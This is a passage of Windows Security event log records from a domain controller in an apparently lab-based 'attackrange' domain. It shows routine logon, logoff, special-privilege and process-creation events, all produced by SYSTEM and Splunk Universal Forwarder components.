Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:40:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263987
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x795D11
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263991
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263990
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263992
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xba0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263993
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1858
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263994
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x188c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263996
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263995
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bcc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263998
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x798B9F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51734
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263997
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x798B9F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:41:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263999
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x798B9F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:41:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264002
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7998F5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:41:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264001
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7998F5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51743
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:41:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264000
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7998F5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:42:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264003
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xccc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264005
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264004
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264006
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264007
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264009
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264008
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfbc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264015
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C814
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264014
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x79C814
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51751
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
